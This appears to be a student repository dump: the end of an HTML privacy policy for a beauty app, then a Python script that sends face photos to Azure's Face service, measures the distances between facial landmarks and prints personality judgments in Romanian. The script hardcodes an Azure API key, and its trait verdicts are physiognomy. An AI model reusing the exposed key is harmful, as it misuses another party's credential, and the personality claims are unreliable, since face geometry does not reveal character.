Legal reasons why data processing is required by law.</t><br><br>\n <article class=\"ac-large\">\n\t\t\t\t\t\t\t<div style=\"overflow-x: scroll;\">\n\t\t\t\t\t\t\t<table border=\"1\" width=\"100%\" cellspacing=\"0\" cellpadding=\"10\">\n\t\t\t\t\t\t\t<tbody>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td colspan=\"4\">\n\t\t\t\t\t\t\t\t<t><b>Overview of information about interactions with us and their consequences on your data</b></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t><strong><em>\n\nDuring which interactions can you provide and we can collect your personal data?\n</em></strong></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t><strong><em>What personal data can we receive from you directly or as a result of your interaction with us?</em></strong></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t><strong><em>\n\nHow and why could we use your data?\n</em></strong></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t><strong><em>\n\nWhat is the legal basis on which we can collect data from you?\n</em></strong></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<t><strong>\n\nCreating and maintaining an Account\nThe information collected during the creation of an account on APPelle sites / applications, through a login on a social networking site or in the store.\n\n</strong></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<t>\n\n\t\t\t\t\t\t\t\tDepending on how much you interact with us, this data may include:</t>\n\t\t\t\t\t\t\t\t<br><t>· Name and surname;</t><br>\n<t>· Gen;</t><br>\n<t>· Email Address;</t><br>\n<t>· Address;</t><br>\n<t>· Phone number;</t><br>\n<t>· Photography;</t><br>\n<t>· Birthday or age;</t><br>\n<t>· ID, username and password;</t><br>\n<t>· Personal description or preferences;</t><br>\n<t>· The data with which you connect on the sites of\nsocialization (if you share this personal data with us).</t><br>\n\n\n\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t> ·Send you marketing communications (if you have requested it) that can be tailored to your \"profile.\" (ie based on personal data we know about you and your preferences);\n\t\t\t\t\t\t\t\t<t>· Management of any contest, promotion, survey or competition in which you choose to participate;</t><br>\n\t\t\t\t\t\t\t\t<t>· Answer your questions and interact with you in other ways.</t><br>\n\t\t\t\t\t\t\t\t<t>· Offer you a loyalty program;</t><br>\n\t\t\t\t\t\t\t\t<t>· Allow you to manage your preferences;</t><br>\n\t\t\t\t\t\t\t\t<t>· Provide you with personalized information based on your beauty features;</t><br>\n\n\n\n</t>\n\n\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t> <strong>Consent</strong></t><br>\n\t\t\t\t\t\t\t<t>\nTo send you marketing communications directly, or to complete a survey\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· Monitoring and improving our websites / applications;</t><br>\n\t\t\t\t\t\t\t\t<t>· Execution of analyzes or collection of statistics;</t><br>\n\t\t\t\t\t\t\t\t<t>· Secure our websites / applications and protect you from fraud;</t><br>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Legitimate interest\n </strong></t>\n\t\t\t\t\t\t\t<t>To ensure that our websites / applications remain secure, to protect them against fraud and to help us better understand your needs and expectations and therefore 
improve our services, products and brands.</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"3\">\n\t\t\t\t\t\t\t<t><strong>\n\nNewsletter and subscription to commercial information\n\n\n</strong></t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"3\">\n\t\t\t\t\t\t\t<t>Depending on how much you interact with us, this data may include:</t>\n\t\t\t\t\t\t\t<t>· Email Address;</t><br>\n\t\t\t\t\t\t\t<t>· Name and surname;</t><br>\n\t\t\t\t\t\t\t<t>· Personal description or preferences;\n</t><br>\n\t\t\t\t\t\t\t<t>· The data with which you connect on social networking sites (if you share this personal data with us).\n</t><br>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>For:</t>\n\t\t\t\t\t\t\t<t>· Send you marketing communications (if you have asked us) that can be tailored to your \"profile\" based on personal data we know about you and your preferences (including the location of your favorite store);</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Consent</strong></t>\n\t\t\t\t\t\t\t<t>To send you marketing communications directly</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· Execution of analyzes or collection of statistics.\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Legitimate interest</strong></t>\n\t\t\t\t\t\t\t<t>To adapt our marketing communications, understand their effectiveness and ensure that you have the most relevant experience; to help us better understand your needs and expectations and therefore improve our services, products and brands.</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· Maintain an up-to-date deletion list if you have requested not to be contacted; ;</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Legal basis</strong></t>\n\t\t\t\t\t\t\t<t>To keep your details on a deletion list if you asked us not to send you any direct marketing.\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<t><strong>Browse online</strong></t>\n\t\t\t\t\t\t\t<t>Information collected through cookies or similar technologies (\"cookies\" *) as part of browsing the APPelle site / applications and / or the site / applications of a third party.\n</t><br>\n\t\t\t\t\t\t\t<t>For information on specific cookies placed on a particular website / application, see the relevant cookie table.\n</t><br>\n\t\t\t\t\t\t\t<t>* Cookies are small text files stored on your device (computer, tablet or mobile) when you are on the Internet, including on the sites of the APPelle group\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<t>Depending on how much you interact with us, this data may include:</t>\n\t\t\t\t\t\t\t<t>· Data regarding your use of our websites / applications:\n</t><br>\n\t\t\t\t\t\t\t<t>· Where are you from;</t><br>\n\t\t\t\t\t\t\t<t>· Authentication details;</t><br>\n\t\t\t\t\t\t\t<t>· The pages you looked at;</t><br>\n\t\t\t\t\t\t\t<t>· Videos you've watched;</t><br>\n\t\t\t\t\t\t\t<t>· The ads you click or place your cursor on;</t><br>\n\t\t\t\t\t\t\t<t>· The products you are looking for;</t><br>\n\t\t\t\t\t\t\t<t>· Your location;</t><br>\n\t\t\t\t\t\t\t<t>· Duration of your visit;</t><br><br>\n\t\t\t\t\t\t\t<t>Technical information:</t><br>\n\t\t\t\t\t\t\t<t>· IP address;</t><br>\n\t\t\t\t\t\t\t<t>· Informații legate de browser; 
</t><br>\n\t\t\t\t\t\t\t<t>· Device information;</t><br><br>\n\t\t\t\t\t\t\t<t>A unique identifier granted to each visitor and the expiry date of such an identifier\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>We use cookies, if necessary, together with other personal data that you have already shared with us (such as previous purchases or if you have subscribed to our e-mail newsletters) or for the following purposes:\n</t><br>\n\t\t\t\t\t\t\t<t>• To allow the proper functioning of our site / applications:</t><br>\n\t\t\t\t\t\t\t<t>· The correct display of the content, the creation and retention of your authentication data;\n</t><br>\n\t\t\t\t\t\t\t<t>· Interface customization, such as language;\n</t><br>\n\t\t\t\t\t\t\t<t>· Parameters attached to your device, including screen resolution, etc.;</t><br>\n\t\t\t\t\t\t\t<t>· Improving our sites / applications, for example, by testing new ideas.\n </t><br>\n\t\t\t\t\t\t\t<t>• To ensure that the site / application is safe and secure and that it protects you against fraud or misuse of our sites or services, for example by performing\ntroubleshooting functions\n</t><br>\n\t\t\t\t\t\t\t<t>• To collect statistics:\n</t><br>\n\t\t\t\t\t\t\t<t>· To avoid double registration of visitors;\n</t><br>\n\t\t\t\t\t\t\t<t>· To know the reaction of users to our advertising campaigns;</t><br>\n\t\t\t\t\t\t\t<t>· To improve our offers;</t><br>\n\t\t\t\t\t\t\t<t>· To know how you discovered our websites / applications.</t><br>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Legitimate interest: </strong></t><br>\n\t\t\t\t\t\t\t<t>To ensure that we provide you with properly functioning and continuously improving websites / applications, advertising and communications for cookies that are (i) essential to the operation of our websites / applications and (ii) needed to keep them safe.</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>• To provide behavioral advertising online: </t><br>\n\t\t\t\t\t\t\t<t>· To show you online ads for products that may be of interest to you, based on previous behavior;</t><br>\n\t\t\t\t\t\t\t<t>· To show you ads and content on social platforms.\n</t><br>\n\t\t\t\t\t\t\t<t>• To customize our services for you:\n</t><br>\n\t\t\t\t\t\t\t<t>· Send you recommendations, marketing or content based on your profile and interests;\n</t><br>\n\t\t\t\t\t\t\t<t>· To display our sites / applications in a tailored way such as login reminder, your language, personalized cookies for the user interface (i.e. the parameters attached to your device, including screen resolution, preference for fonts, etc.)</t>\n\t\t\t\t\t\t\t<br><t>• To allow the distribution of our content on social networking sites (distribution buttons for displaying the site).\n</t><br>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Consent</strong></t>\n\t\t\t\t\t\t\t<t>For all other cookies.</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<t><strong>Promotional operations</strong></t>\n\t\t\t\t\t\t\t<t>Information collected during a game, contests, promotional offers, sample requests, surveys.\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<t>Depending on how much you interact with us, this data may include:\n</t>\n\t\t\t\t\t\t\t<t>· Name and surname;</t>\n\t\t\t\t\t\t\t<t>· Email Address;</t>\n\t\t\t\t\t\t\t<t>· Phone number;</t>\n\t\t\t\t\t\t\t<t>· Sex;</t>\n\n\t\t\t\t\t\t\t<t>· Personal description or preferences;\n</t>\n\t\t\t\t\t\t\t<t>· The data with which you log on to social networking sites (if you share this data with us);</t>\n\t\t\t\t\t\t\t<t>· Other information you shared with us about you, for example, via the \"My Account\" page, by contacting us or providing your own content (such as photos or reviews, or a question via the chat feature available on certain sites / applications, or participating in a contest, game, poll).\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· To complete the tasks you have asked us to do, for example to manage your participation in contests, games and surveys, including to take into account your feedback and suggestions;\n</t>\n\t\t\t\t\t\t\t<t>· Send you marketing communications (when requested) - by including you in a specific marketing database through which we send you personalized marketing information (based on profiling) by electronic means (e.g. by e-mail, via SMS, etc., depending on your option)</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<t>· <strong>Consent</strong></t>\n\t\t\t\t\t\t\t<t>To send you marketing communications directly or to access your requests.\n</t>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· For statistical purposes.</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Legitimate interest </strong></p>\n\t\t\t\t\t\t\t<p>To help us better understand your needs and expectations and therefore improve our services, products and brands\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<p><strong>User-generated content</strong></p>\n\t\t\t\t\t\t\t<p>The information collected when you submitted certain content on a social platform or we accepted the reuse of the content you posted on social media platforms.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<p>Depending on how much you interact with us, this data may include:</p>\n\t\t\t\t\t\t\t<p>· Name and surname or pseudonym;</p>\n\t\t\t\t\t\t\t<p>· Email Address;</p>\n\t\t\t\t\t\t\t<p>· Photo;</p>\n\t\t\t\t\t\t\t<p>· Personal description or preferences;</p>\n\t\t\t\t\t\t\t<p>· The data with which you log in on social networking sites (if you share this data with us);\n</p>\n\t\t\t\t\t\t\t<p>· Other information you shared with us about you, for example, via the \"My Account\" page, by contacting us or providing your own content (such as photos or reviews, or a question via the chat feature available on certain sites / applications).\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>• In accordance with the specific terms and conditions accepted by you:\n</p>\n\t\t\t\t\t\t\t<p>· To post your review or content;</p>\n\t\t\t\t\t\t\t<p>· Promoting our products.</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p><strong>Consent</strong></p>\n\t\t\t\t\t\t\t<p>· To use content posted online.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· For statistical purposes.</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Legitimate interest\n</strong></p>\n\t\t\t\t\t\t\t<p>To help us better understand your needs and expectations and therefore improve and promote our services, products and
brands.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<p><strong>Use of applications and devices\n</strong></p>\n\t\t\t\t\t\t\t<p>The information collected as part of your use of our applications and / or devices.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"2\">\n\t\t\t\t\t\t\t<p>Depending on how much you interact with us, this data may include:</p>\n\t\t\t\t\t\t\t<p>· Name and surname;</p>\n\t\t\t\t\t\t\t<p>· Email Address;</p>\n\t\t\t\t\t\t\t<p>· Location;</p>\n\t\t\t\t\t\t\t<p>· Date of birth;</p>\n\t\t\t\t\t\t\t<p>· Personal description or preferences;\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>For:</p>\n\t\t\t\t\t\t\t<p>· Provide you with the requested service (for example, practical testing of our products, tips and notifications on sun exposure, hair care, etc.);</p>\n\t\t\t\t\t\t\t<p>· Analyzing your appearance characteristics and recommending the right products (including customized products) and care;\n</p>\n\t\t\t\t\t\t\t<p>· Offering product recommendations and care;</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Fulfilling a contract</strong></p>\n\t\t\t\t\t\t\t<p>To provide you with the requested service (including, if necessary, analysis by the research and innovation team of the algorithm required to provide the service).</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· For research and innovation by APPelle scientists;</p>\n\t\t\t\t\t\t\t<p>· To monitor and improve our applications and devices;\n</p>\n\t\t\t\t\t\t\t<p>· For statistical purposes.</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Legitimate interest\n</strong></p>\n\t\t\t\t\t\t\t<p>To always improve our products and services to meet your needs and expectations and for research and innovation purposes.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td rowspan=\"3\">\n\t\t\t\t\t\t\t<p><strong>Requests</strong></p>\n\t\t\t\t\t\t\t<p>The information collected when you ask questions (for example, through the customer department) about our brands, products and use.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td rowspan=\"3\">\n\t\t\t\t\t\t\t<p>Depending on how much you interact with us, this data may include:</p>\n\t\t\t\t\t\t\t<p>· Name and surname;</p>\n\t\t\t\t\t\t\t<p>· Email Address;</p>\n\t\t\t\t\t\t\t<p>· Location;</p>\n\t\t\t\t\t\t\t<p>· Date of birth;</p>\n\t\t\t\t\t\t\t<p>· Personal description or preferences;\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· To be able to answer your questions;</p>\n\t\t\t\t\t\t\t<p>· When necessary, to connect you to the relevant services</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Consent\n</strong></p>\n\t\t\t\t\t\t\t<p>To answer your questions</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· For statistical purposes.</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Legitimate interest\n</strong></p>\n\t\t\t\t\t\t\t<p>To help us better understand the needs and expectations of our customers and therefore improve our services, products and brands.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>• For Cosmetovigilance:\n </p>\n\t\t\t\t\t\t\t<p>· Monitoring and preventing any unwanted effects
related to the use of our products;\n</p>\n\t\t\t\t\t\t\t<p>· For conducting studies on the safe use of our products;\n</p>\n\t\t\t\t\t\t\t<p>· To carry out and monitor corrective action taken, where necessary.</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Legal basis</strong></p>\n\t\t\t\t\t\t\t<p>To comply with the legal obligation to monitor the adverse effects of our products.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p><strong>Sponsorships</strong></p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>Depending on how much you interact with us, this data may include:</p>\n\t\t\t\t\t\t\t<p>· Name and surname;</p>\n\t\t\t\t\t\t\t<p>· Email Address;</p>\n\t\t\t\t\t\t\t<p>· Phone number;</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· To send information about our products.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<p>· <strong>Fulfilling a contract\n</strong></p>\n\t\t\t\t\t\t\t<p>To comply with the request.\n</p>\n\t\t\t\t\t\t\t<p><strong>And</strong></p>\n\t\t\t\t\t\t\t<p>· <strong>Legitimate interest\n</strong></p>\n\t\t\t\t\t\t\t<p>To contact a person at the request of another person.\n</p>\n\t\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t</tbody>\n\t\t\t\t\t\t\t</table>\n\t\t\t\t\t\t\t</div>\n\n        </div>\n      </div>\n    </div>\n  </div>\n\n\n  <div class=\"footer\">\n    <div class=\"footerbar\">\n      <a href=\"#Copyright\">Copyright @APPelle 2020</a>\n\t\t<a href=\"http://127.0.0.1:5000/terms\" class=\"right\">Terms and conditions</a>\n\t\t<a href=\"http://127.0.0.1:5000/personaldata\" class=\"right\">Protection of personal data</a>\n    </div>\n  </div>\n</body>\n</html>"
},
{
"alpha_fraction": 0.6470639705657959,
"alphanum_fraction": 0.6513266563415527,
"avg_line_length": 57.06060791015625,
"blob_id": "548a3f8afa9836956e0f7f4d0bcc5b547609685c",
"content_id": "9a92f4280ed0387b3d559a67e3b1fb3fd0d45777",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11495,
"license_type": "no_license",
"max_line_length": 376,
"num_lines": 198,
"path": "/Ai/ApiFacial.py",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "from io import BytesIO\nimport os\nfrom PIL import Image, ImageDraw\nimport requests\nimport math\nfrom azure.cognitiveservices.vision.face import FaceClient\nfrom azure.cognitiveservices.vision.face.models import FaceAttributeType\nfrom msrest.authentication import CognitiveServicesCredentials\n\n\nKEY = '99f1b2d5bb01427fb0f7ec8f1b859a1a'\n\nENDPOINT = 'https://appelleface.cognitiveservices.azure.com/'\n\nface_client = FaceClient(ENDPOINT, CognitiveServicesCredentials(KEY))\n\n\ndef face_scan(face1 : str):\n\n face_attributes = ['age', 'gender', 'headPose', 'smile', 'facialHair', 'glasses', 'emotion']\n\n image = open(face1 , 'r+b')\n detected_faces = face_client.face.detect_with_stream(image,return_face_landmarks=True,return_face_attributes=face_attributes)\n if not detected_faces:\n raise Exception(\n 'No face detected from image')\n\n for face in detected_faces:\n eye_left_top = face.face_landmarks.eye_left_top\n eye_left_bottom = face.face_landmarks.eye_left_bottom\n eye_left_outer = face.face_landmarks.eye_left_outer\n eye_left_inner = face.face_landmarks.eye_left_inner\n eye_right_top = face.face_landmarks.eye_right_top\n eye_right_bottom = face.face_landmarks.eye_right_bottom\n eye_right_outer = face.face_landmarks.eye_right_outer\n eye_right_inner = face.face_landmarks.eye_right_inner\n pupil_left = face.face_landmarks.pupil_left\n pupil_right = face.face_landmarks.pupil_right\n nose_tip = face.face_landmarks.nose_tip\n mouth_left = face.face_landmarks.mouth_left\n mouth_right = face.face_landmarks.mouth_right\n eyebrow_left_outer = face.face_landmarks.eyebrow_left_outer\n eyebrow_left_inner = face.face_landmarks.eyebrow_left_inner\n eyebrow_right_inner = face.face_landmarks.eyebrow_right_inner\n eyebrow_right_outer = face.face_landmarks.eyebrow_right_outer\n nose_root_left = face.face_landmarks.nose_root_left\n nose_root_right = face.face_landmarks.nose_root_right\n nose_left_alar_top = face.face_landmarks.nose_left_alar_top\n nose_right_alar_top = face.face_landmarks.nose_right_alar_top\n nose_left_alar_out_tip = face.face_landmarks.nose_left_alar_out_tip\n nose_right_alar_out_tip = face.face_landmarks.nose_right_alar_out_tip\n upper_lip_top = face.face_landmarks.upper_lip_top\n upper_lip_bottom = face.face_landmarks.upper_lip_bottom\n under_lip_top = face.face_landmarks.under_lip_top\n under_lip_bottom = face.face_landmarks.under_lip_bottom\n face_age = face.face_attributes.age\n face_gender = face.face_attributes.gender\n head_pose = face.face_attributes.head_pose\n smile = face.face_attributes.smile\n facial_hair = face.face_attributes.facial_hair\n glasses = face.face_attributes.glasses\n face_emotion = face.face_attributes.emotion\n dicti = {\n 'eye_left_top' : eye_left_top,\n 'eye_left_bottom' : eye_left_bottom,\n 'eye_left_outer' : eye_left_outer,\n 'eye_left_inner' : eye_left_inner,\n 'eye_right_top' : eye_right_top,\n 'eye_right_bottom' : eye_right_bottom,\n 'eye_right_outer' : eye_right_outer,\n 'eye_right_inner' : eye_right_inner,\n 'pupil_left' : pupil_left,\n 'pupil_right' : pupil_right,\n 'nose_tip' : nose_tip,\n 'mouth_left' : mouth_left,\n 'mouth_right' : mouth_right,\n 'eyebrow_left_outer' : eyebrow_left_outer,\n 'eyebrow_left_inner' : eyebrow_left_inner,\n 'eyebrow_right_inner' : eyebrow_right_inner,\n 'eyebrow_right_outer' : eyebrow_right_outer,\n 'nose_root_left' : nose_root_left,\n 'nose_root_right' : nose_root_right,\n 'nose_left_alar_top' : nose_left_alar_top,\n 'nose_right_alar_top' : nose_right_alar_top,\n 'nose_left_alar_out_tip' : 
nose_left_alar_out_tip,\n            'nose_right_alar_out_tip' : nose_right_alar_out_tip,\n            'upper_lip_top' : upper_lip_top,\n            'upper_lip_bottom' : upper_lip_bottom,\n            'under_lip_top' : under_lip_top,\n            'under_lip_bottom' : under_lip_bottom,\n            'face_age' : face_age,\n            'face_gender' : face_gender,\n            'head_pose' : head_pose,\n            'smile' : smile,\n            'facial_hair' : facial_hair,\n            'glasses' : glasses,\n            'face_emotion' : face_emotion\n        }\n\n        return dicti\n\n\n        # def getRectangle(faceDictionary):\n        #     rect = faceDictionary.face_rectangle\n        #     left = rect.left\n        #     top = rect.top\n        #     right = left + rect.width\n        #     bottom = top + rect.height\n        #\n        #     return ((left, top), (right, bottom))\n        # response = requests.get(image)\n        # img = Image.open(BytesIO(response.content))\n        #\n        # # For each face returned use the face rectangle and draw a red box.\n        # print('Drawing rectangle around face... see popup for results.')\n        # print()\n        # draw = ImageDraw.Draw(img)\n        # for face in detected_faces:\n        #     draw.rectangle(getRectangle(face), outline='red')\n        #\n        # img.show()\n\n\ndef file_user(filename):\n\n    location_file = str(filename)\n    dicti = face_scan(location_file)\n\n    text = \"\"\n\n    # Euclidean distances between facial landmarks: sqrt((x2-x1)^2 + (y2-y1)^2)\n    distanta_intre_pupile = int(math.sqrt((dicti['pupil_right'].x - dicti['pupil_left'].x) ** 2\n                                          + (dicti['pupil_right'].y - dicti['pupil_left'].y) ** 2))\n    marimea_ochi_latura_a = int(math.sqrt((dicti['eye_left_inner'].x - dicti['eye_left_outer'].x) ** 2\n                                          + (dicti['eye_left_inner'].y - dicti['eye_left_outer'].y) ** 2))\n    marimea_ochi_latura_b = int(math.sqrt((dicti['eye_left_bottom'].x - dicti['eye_left_top'].x) ** 2\n                                          + (dicti['eye_left_bottom'].y - dicti['eye_left_top'].y) ** 2))\n    arie = marimea_ochi_latura_a * marimea_ochi_latura_b\n    lungimea_gurii = int(math.sqrt((dicti['mouth_right'].x - dicti['mouth_left'].x) ** 2\n                                   + (dicti['mouth_right'].y - dicti['mouth_left'].y) ** 2))\n    lungimea_sprancenelor_stanga = int(math.sqrt((dicti['eyebrow_left_inner'].x - dicti['eyebrow_left_outer'].x) ** 2\n                                                 + (dicti['eyebrow_left_inner'].y - dicti['eyebrow_left_outer'].y) ** 2))\n    lungimea_sprancenelor_dreapta = int(math.sqrt((dicti['eyebrow_right_outer'].x - dicti['eyebrow_right_inner'].x) ** 2\n                                                  + (dicti['eyebrow_right_outer'].y - dicti['eyebrow_right_inner'].y) ** 2))\n    marimea_buzelor_sus = int(math.sqrt((dicti['upper_lip_top'].x - dicti['upper_lip_bottom'].x)**2 + (dicti['upper_lip_top'].y - dicti['upper_lip_bottom'].y)**2 ))\n    marimea_buzelor_jos = int(math.sqrt((dicti['under_lip_top'].x - dicti['under_lip_bottom'].x) ** 2 + (dicti['under_lip_top'].y - dicti['under_lip_bottom'].y) ** 2))\n\n    latimea_buzelor = marimea_buzelor_sus + marimea_buzelor_jos\n\n    distanta_sprancene = int(dicti['eyebrow_right_inner'].x - dicti['eyebrow_left_inner'].x)\n\n    distanta_intre_ochi = int(dicti['eye_right_inner'].x - dicti['eye_left_inner'].x)\n\n    distanta_ochi_spranceana = int(dicti['eyebrow_right_inner'].y) - int(dicti['eye_left_inner'].y)\n\n    marimea_nas = int(dicti['nose_root_left'].y) - int(dicti['nose_left_alar_out_tip'].y)\n    if distanta_intre_pupile > marimea_ochi_latura_a + 100:\n        text = text + \"Inseamna ca persoana este neglijenta, indiferenta si da dovada de napasare in modul lor de a se comporta.
Sunt lenti in decizii si nu sunt potriviti in activitati care presupun reactii rapide si agerime.\\nAu, in schimb, o capacitate foarte mare de memorare, sunt rezistenti, toleranti si foarte meticulosi in ceea ce fac.\\n\\n\"\n else: text = text + \"Persoana are o opinie ingusta asupra realitatii si foarte putina toleranta fata de semeni. E greu de multumit, devine rareori obraznic si are asteptari mari de la alti oameni si de la situatiile din viata lor.\\nAu, in schimb, capacitatea de a se concentra foartre bine, sunt buni observatori si obtin rezultate remarcabile in analiza si calcule.\\n\\n\"\n\n if marimea_buzelor_jos - marimea_buzelor_sus < 6:\n text = text + \"Persoana da mai multa atentie\\n\\n\"\n else: text = text + \"Persona are nevoie de mai multa atentie.\\n\\n\"\n\n\n if marimea_ochi_latura_b > distanta_ochi_spranceana:\n text = text + \"Persoana este prietenoasa, se implica foarte puternic in relatoole cu persoanale pe care doresc sa le ajute.\\nCu cat sunt mai joase, cu atat sunt mai implicate in aceste relatii.\\n\\n\"\n else: text = text + \"Persoana este foarte pretentioasa, are roleranta ridicata, afiseaza un aer aristocratic, rece si detasat. Se spune ca are eleganta si diplomatia innascute.\\nIsi fac cu greu 